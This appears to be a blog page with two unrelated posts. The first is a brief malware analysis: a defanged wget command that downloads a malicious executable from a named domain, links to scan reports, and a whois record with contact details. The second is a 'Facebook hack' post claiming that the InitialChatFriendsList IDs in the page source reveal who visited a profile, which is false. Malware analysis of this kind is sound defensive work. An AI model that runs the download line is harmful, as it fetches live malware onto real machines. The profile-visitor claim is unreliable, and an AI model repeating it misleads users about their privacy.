wget --save-headers h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Download this file and let's see its reports.

VirusTotal report

https://www.virustotal.com/en/file/09d4986243951c6eafd4b715dd6b01a3a08e56dc61528387a914115f304b5583/analysis/1365682386/

Anubis report

http://anubis.iseclab.org/?action=result&task_id=106d9fecea32c098409aa191b7f285fd4&format=pdf

So malware confirmed.

In the process of analysis I came across “h00p://golf2day[dot]com/wnqe.html”, but I was not able to confirm why it is malicious, or is declared malicious by the browser, as it was asking for some ID and password and creating a secure connection.

Anyhow, let's see the domain and the whois of this domain.

whois 3d-game.com
  Domain Name: 3D-GAME.COM
  Registrar: DNC HOLDINGS, INC.
  Whois Server: whois.directnic.com
  Referral URL: http://www.directnic.com
  Name Server: NS1.DTDNS.COM
  Name Server: NS2.DTDNS.COM
  Name Server: NS3.DTDNS.COM
  Status: clientDeleteProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 03-oct-2012
  Creation Date: 13-apr-2003
  Expiration Date: 13-apr-2014

Registrant: North Loop Networks
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Domain Name: 3D-GAME.COM

Administrative Contact:
Manager, Hostmaster hostmaster@northloopnetworks.com
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Technical Contact:
Manager, Hostmaster hostmaster@northloopnetworks.com
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Record last updated 03-02-2011 12:39:17 PM
Record expires on 04-13-2014
Record created on 04-13-2003

Domain servers in listed order:
NS1.DTDNS.COM 64.156.29.49
NS2.DTDNS.COM 67.228.106.194
NS3.DTDNS.COM 75.126.80.224


#MalwareMustDie

Facebook Hack, Who visited your profile.


It's a simple Facebook hack, nothing like a privacy leak or something, so I am not expecting any death threats because of this. If you are still interested in sending some of those, then send them to my personal ID, not my official one 😉

You don't have to give any permission or install anything; simply try this in your browser, and there is nothing like an information leak. It has just 5 very simple steps.
1) Log in to your Facebook: I hope this is something very simple and needs no explanation.

2) View source, or use this link “view-source:www.facebook.com”: this is something very simple; if not, go to your Facebook, right click and view the source code.

3) Search for “InitialChatFriendsList”: after opening your source code, press (ctrl+f) and search for this string.
4) Right after this keyword you will see {“list”:[“1111111111”,“2222222222”,…,“9999999999”]}: you are going to see a string like this just after what you searched for, and it will contain some random numbers.

5) Replace X with the ID to view the person's profile, www.facebook.com/XXXXXXXXXX, and see the person who visited your profile.

I hope this is pretty Simple, Post your comments.

 

Regards

Unknown_had
